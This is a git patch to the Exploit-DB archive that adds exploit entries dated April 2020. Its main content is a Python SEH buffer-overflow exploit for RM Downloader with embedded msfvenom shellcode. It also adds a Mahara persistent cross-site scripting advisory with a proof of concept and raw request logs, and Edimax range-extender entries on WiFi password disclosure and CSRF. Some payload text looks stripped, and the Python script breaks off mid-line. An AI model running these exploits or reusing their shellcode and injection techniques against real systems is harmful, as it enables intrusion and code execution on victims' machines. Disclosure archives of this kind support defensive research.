From 7b676133d39c5513942f3dde6073b9739ff01226 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 23 Apr 2020 05:01:50 +0000 Subject: [PATCH] DB: 2020-04-23 5 changes to exploits/shellcodes Vesta Control Panel 0.9.8-16 - Local Privilege Escalation RM Downloader 3.1.3.2.2010.06.13 - 'Load' Buffer Overflow (SEH) Edimax EW-7438RPn - Information Disclosure (WiFi Password) Edimax EW-7438RPn - Cross-Site Request Forgery (MAC Filtering) Mahara 19.10.2 CMS - Persistent Cross-Site Scripting --- exploits/hardware/webapps/48365.txt | 94 +++++++++++ exploits/hardware/webapps/48366.txt | 32 ++++ exploits/linux/local/40953.sh | 2 +- exploits/linux/webapps/48367.txt | 248 ++++++++++++++++++++++++++++ exploits/windows/local/48364.py | 69 ++++++++ files_exploits.csv | 6 +- 6 files changed, 449 insertions(+), 2 deletions(-) create mode 100644 exploits/hardware/webapps/48365.txt create mode 100644 exploits/hardware/webapps/48366.txt create mode 100644 exploits/linux/webapps/48367.txt create mode 100755 exploits/windows/local/48364.py diff --git a/exploits/hardware/webapps/48365.txt b/exploits/hardware/webapps/48365.txt new file mode 100644 index 000000000..c8a33a664 --- /dev/null +++ b/exploits/hardware/webapps/48365.txt @@ -0,0 +1,94 @@ +# Exploit Title: Edimax EW-7438RPn 1.13 - Information Disclosure (WiFi Password) +# Date: 2020-04-21 +# Exploit Author: Besim ALTINOK +# Vendor Homepage: https://www.edimax.com/edimax/merchandise/merchandise_detail/data/edimax/global/wi-fi_range_extenders_n300/ew-7438rpn_mini/ +# Version:1.13 +# Tested on: Edimax EW-7438RPn 1.13 Version + +----------------------------- +Here step by step : + + 1. I did Setup + 2. After setup try to access to *wlencrypt_wiz.asp* file + 3. After access to this file, I saw some information disclosure +(Like *WiFi Password*) + 4. Here is the all leak here: + +------------------------------- + + +
+ + + + + + + + +
+ + + +-- + +Besim ALTINOK + +*Security Engineer* \ No newline at end of file diff --git a/exploits/linux/local/40953.sh b/exploits/linux/local/40953.sh index b00215e3a..e56a4c896 100755 --- a/exploits/linux/local/40953.sh +++ b/exploits/linux/local/40953.sh @@ -2,7 +2,7 @@ # # Exploit Title: Vesta Control Panel 0.9.7 <= 0.9.8-16 Local Privilege Escalation Exploit # Google Dork: vesta control panel inurl:8083 -# Exploit Author: Luka Pusic, Jaka Hudoklin @offlinehacker +# Exploit Author: Jaka Hudoklin @offlinehacker # Vendor Homepage: http://vestacp.com/ # Software Link: https://github.com/serghey-rodin/vesta # Version: 0.9.7 - 0.9.8-16 diff --git a/exploits/linux/webapps/48367.txt b/exploits/linux/webapps/48367.txt new file mode 100644 index 000000000..acf9f3180 --- /dev/null +++ b/exploits/linux/webapps/48367.txt @@ -0,0 +1,248 @@ +# Title: Mahara 19.10.2 CMS - Persistent Cross-Site Scripting +# Author: Vulnerability Laboratory +# Date: 2020-04-21 +# Vendor: https://mahara.org +# Software Link: https://launchpad.net/mahara +# CVE: N/A + +Document Title: +=============== +Mahara v19.10.2 CMS - Persistent Cross Site Vulnerability + +References (Source): +==================== +https://www.vulnerability-lab.com/get_content.php?id=2217 + +Release Date: +============= +2020-04-21 + +Common Vulnerability Scoring System: +==================================== +4.3 + +Affected Product(s): +==================== +Catalyst IT Ltd. +Product: Mahara v19.10.2 - CMS (Web-Application) +https://launchpad.net/mahara & https://mahara.org + +Vulnerability Disclosure Timeline: +================================== +2020-04-21: Public Disclosure (Vulnerability Laboratory) + + +Technical Details & Description: +================================ +A persistent input validation web vulnerability has been discovered in +the official Mahara v19.10.2 CMS web-application series. +The vulnerability allows remote attackers to inject own malicious script +codes with persistent attack vector to compromise browser +to web-application requests from the application-side. + +The persistent vulnerability is located in the `nombre` and +`descripción` parameters of the `Ficheros` module in the +`groupfiles.php` file. +Remote attackers with low privileges are able to inject own malicious +persistent script code as files and foldernames. The injected code can +be used to attack the frontend or backend of the web-application. The +request method to inject is POST and the attack vector is located on +the application-side. Files are able to be reviewed in the backend by +higher privileged accounts and can be shared. + +Successful exploitation of the vulnerabilities results in session +hijacking, persistent phishing attacks, persistent external redirects to +malicious source and persistent manipulation of affected application +modules. + +Request Method(s): +[+] POST + +Vulnerable Module(s): +[+] Ficheros (Files Manager) + +Vulnerable Input(s): +[+] Crear Carpeta + +Vulnerable File(s): +[+] groupfiles.php + + +Vulnerable Parameter(s): +[+] nombre +[+] descripción + +Affected Module(s): +[+] Página principal + + +Proof of Concept (PoC): +======================= +The persistent web vulnerability can be exploited by low privileged web +application user account with low user interaction. +For security demonstration or to reproduce the vulnerability follow the +provided information and steps below to continue. + + +Manual steps to reproduce ... +1. Open the web-application and login as regular user +2. Move inside the mygroup management +3. Open the ficheros tab on top +4. Inject test payload into the crear carpeta (Nombre & Descripción) +input field for the página principal to output +Note: The execution point occurs on edit, list and delete interaction +5. The created path listings are available for higher privileged user +account that review (Backend) +6. Successul reproduce of the persistent cross site web vulnerability! + + +PoC: Vulnerable Source (Inject via Crear Carpeta Input for Página Principal) + + +
+Seleccionar y arrastrar para mover >" +>" + +
+ + +Carpeta: +>" +>" + + +>" >" + +20/04/2020 + + +
+... ... + +
+ + +--- PoC Session Logs [POST] --- (Mygroup Ficheros) +https://mahara_cms.localhost:8080/artefact/file/groupfiles.php?group=27&folder=0&owner=group&ownerid=27 +Host: mahara_cms.localhost:8080 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate, br +Content-Type: multipart/form-data; +boundary=---------------------------98107146915324237501974151621 +Content-Length: 4879 +Origin: https://mahara_cms.localhost:8080 +Connection: keep-alive +Referer: +https://mahara_cms.localhost:8080/artefact/file/groupfiles.php?group=27&folder=0&owner=group&ownerid=27 +Cookie: __cfduid=d6b9845d834027b2fd8a2223c5b559f2f1587303558; +mahara=82af10d7e4d0a63e1395d579d0d2f4ea8fb16a18b0e97378b0473c0cf32d1b76; +folder=0&files_filebrowser_changefolder=&files_filebrowser_foldername=Página +principal&files_filebrowser_uploadnumber=1&files_filebrowser_upload=0&MAX_FILE_SIZE=1610608640&files_filebrowser_license=& +files_filebrowser_license_other=&files_filebrowser_licensor=&files_filebrowser_licensorurl=&files_filebrowser_resizeonuploaduserenable=on&userfile[]=&files_filebrowser_move=&files_filebrowser_moveto=&files_filebrowser_createfolder_name=&files_filebrowser_edit_orientation=0& +files_filebrowser_edit_title=>" >"&files_filebrowser_edit_description=>" +>"&files_filebrowser_permission:member:view=on&files_filebrowser_permission:member:edit=on& +files_filebrowser_permission:member:republish=on&files_filebrowser_edit_license=&files_filebrowser_edit_license_other=& +files_filebrowser_edit_licensor=>" >"&files_filebrowser_edit_licensorurl=>" +>"&files_filebrowser_edit_allowcomments=on& +files_filebrowser_update[7191]=Guardar +cambios&sesskey=pFJC0a1dZWsy8rEA&pieform_files=&pieform_jssubmission=1,1,1 +- +POST: HTTP/2.0 200 OK +content-type: text/html; charset=UTF-8 +vary: Accept-Encoding +cache-control: no-store, no-cache, must-revalidate +set-cookie: +mahara=82af10d7e4d0a63e1395d579d0d2f4ea8fb16a18b0e97378b0473c0cf32d1b76; +path=/; secure; HttpOnly +content-encoding: br +X-Firefox-Spdy: h2- +https://mahara_cms.localhost:8080/artefact/file/groupfiles.php?group=27&folder=0&owner=group&ownerid= +- +Host: mahara_cms.localhost:8080 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate, br +Content-Type: multipart/form-data; +boundary=---------------------------126319663526561351602937008964 +Content-Length: 3721 +Origin: https://mahara_cms.localhost:8080 +Connection: keep-alive +Referer: +https://mahara_cms.localhost:8080/artefact/file/groupfiles.php?group=27&folder=0&owner=group&ownerid= +Cookie: __cfduid=d6b9845d834027b2fd8a2223c5b559f2f1587303558; +mahara=82af10d7e4d0a63e1395d579d0d2f4ea8fb16a18b0e97378b0473c0cf32d1b76; +folder=0&files_filebrowser_changefolder=&files_filebrowser_foldername=Página +principal&files_filebrowser_uploadnumber=1&files_filebrowser_upload=0&MAX_FILE_SIZE=1610608640&files_filebrowser_license=& +files_filebrowser_license_other=&files_filebrowser_licensor=&files_filebrowser_licensorurl=&files_filebrowser_resizeonuploaduserenable=on&userfile[]=&files_filebrowser_move=&files_filebrowser_moveto=&files_filebrowser_createfolder_name=&files_filebrowser_delete[7192]=&files_filebrowser_edit_orientation=0&files_filebrowser_edit_title=&files_filebrowser_edit_description=&files_filebrowser_edit_license=& +files_filebrowser_edit_license_other=&files_filebrowser_edit_licensor=&files_filebrowser_edit_licensorurl=& +sesskey=pFJC0a1dZWsy8rEA&pieform_files=&pieform_jssubmission=1,1 +- +GET: HTTP/2.0 200 OK +content-type: text/html; charset=UTF-8 +vary: Accept-Encoding +cache-control: no-store, no-cache, must-revalidate +set-cookie: +mahara=82af10d7e4d0a63e1395d579d0d2f4ea8fb16a18b0e97378b0473c0cf32d1b76; +path=/; secure; HttpOnly +content-encoding: br +X-Firefox-Spdy: h2 + + +Reference(s): +https://mahara_cms.localhost:8080/artefact/ +https://mahara_cms.localhost:8080/artefact/file/ +https://mahara_cms.localhost:8080/artefact/file/groupfiles.php + + +Credits & Authors: +================== +Vulnerability-Lab - +https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab +Benjamin Kunz Mejri - +https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. + + +-- +VULNERABILITY LABORATORY - RESEARCH TEAM \ No newline at end of file diff --git a/exploits/windows/local/48364.py b/exploits/windows/local/48364.py new file mode 100755 index 000000000..9cc992e06 --- /dev/null +++ b/exploits/windows/local/48364.py @@ -0,0 +1,69 @@ +# Exploit Title: RM Downloader 3.1.3.2.2010.06.13 - 'Load' Buffer Overflow (SEH) +# Date: 2020-04-20 +# Author: Felipe Winsnes +# Software Link: https://www.exploit-db.com/apps/9af366e59468eac0b92212912b5c3bcb-RMDownloader.exe +# Version: 3.1.3.2.2010.06.13 +# Tested on: Windows 7 (x86) + +# Proof of Concept: +# 1.- Run the python script, it will create a new file "poc.txt" +# 2.- Copy the content of the new file 'poc.txt' to clipboard +# 3.- Open 'RmDownloader.exe' +# 4.- Go to 'Load' tab +# 5.- Paste clipboard in 'Load' parameter +# 6.- Click on button 'OK' +# 7.- Two messageboxes regarding the length of the payload will pop up, click OK +# 8.- Profit + +# Blog where the vulnerability is explained: https://whitecr0wz.github.io/posts/RM-Downloader-SEH/ + +import struct + +# msfvenom -p windows/exec CMD=calc.exe -f py -e x86/alpha_mixed EXITFUNC=thread +# Payload size: 448 bytes + +buf = b"" +buf += b"\x89\xe3\xda\xd0\xd9\x73\xf4\x5f\x57\x59\x49\x49\x49" +buf += b"\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43" +buf += b"\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41" +buf += b"\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42" +buf += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x39\x78\x6b" +buf += b"\x32\x53\x30\x57\x70\x57\x70\x35\x30\x4d\x59\x4d\x35" +buf += b"\x46\x51\x79\x50\x72\x44\x4e\x6b\x56\x30\x76\x50\x4c" +buf += b"\x4b\x50\x52\x66\x6c\x4c\x4b\x66\x32\x72\x34\x4e\x6b" +buf += b"\x63\x42\x67\x58\x46\x6f\x4e\x57\x71\x5a\x47\x56\x35" +buf += b"\x61\x4b\x4f\x6c\x6c\x65\x6c\x51\x71\x61\x6c\x73\x32" +buf += b"\x66\x4c\x31\x30\x7a\x61\x6a\x6f\x54\x4d\x37\x71\x79" +buf += b"\x57\x4d\x32\x4c\x32\x36\x32\x62\x77\x6c\x4b\x76\x32" +buf += b"\x42\x30\x4e\x6b\x61\x5a\x45\x6c\x4c\x4b\x42\x6c\x32" +buf += b"\x31\x42\x58\x4d\x33\x32\x68\x47\x71\x6b\x61\x70\x51" +buf += b"\x6c\x4b\x61\x49\x47\x50\x33\x31\x4b\x63\x4e\x6b\x30" +buf += b"\x49\x67\x68\x49\x73\x35\x6a\x30\x49\x6c\x4b\x45\x64" +buf += b"\x4c\x4b\x35\x51\x69\x46\x45\x61\x4b\x4f\x4c\x6c\x4b" +buf += b"\x71\x68\x4f\x34\x4d\x66\x61\x69\x57\x34\x78\x59\x70" +buf += b"\x54\x35\x38\x76\x73\x33\x51\x6d\x39\x68\x35\x6b\x71" +buf += b"\x6d\x56\x44\x30\x75\x5a\x44\x76\x38\x4c\x4b\x72\x78" +buf += b"\x54\x64\x33\x31\x38\x53\x70\x66\x6e\x6b\x56\x6c\x70" +buf += b"\x4b\x4e\x6b\x50\x58\x75\x4c\x55\x51\x78\x53\x4e\x6b" +buf += b"\x56\x64\x6e\x6b\x73\x31\x6e\x30\x6e\x69\x37\x34\x56" +buf += b"\x44\x71\x34\x53\x6b\x33\x6b\x63\x51\x61\x49\x73\x6a" +buf += b"\x56\x31\x6b\x4f\x49\x70\x73\x6f\x31\x4f\x43\x6a\x4e" +buf += b"\x6b\x67\x62\x6a\x4b\x6e\x6d\x73\x6d\x32\x4a\x46\x61" +buf += b"\x6c\x4d\x4c\x45\x38\x32\x47\x70\x35\x50\x67\x70\x62" +buf += b"\x70\x53\x58\x54\x71\x4c\x4b\x52\x4f\x4b\x37\x49\x6f" +buf += b"\x38\x55\x6d\x6b\x49\x70\x65\x4d\x46\x4a\x75\x5a\x31" +buf += b"\x78\x79\x36\x7a\x35\x6f\x4d\x6d\x4d\x4b\x4f\x68\x55" +buf += b"\x65\x6c\x57\x76\x71\x6c\x47\x7a\x4f\x70\x49\x6b\x6b" +buf += b"\x50\x74\x35\x37\x75\x6d\x6b\x61\x57\x75\x43\x71\x62" +buf += b"\x72\x4f\x43\x5a\x65\x50\x66\x33\x6b\x4f\x6a\x75\x70" +buf += b"\x63\x55\x31\x72\x4c\x31\x73\x76\x4e\x72\x45\x43\x48" +buf += b"\x50\x65\x67\x70\x41\x41" + + +nseh = struct.pack("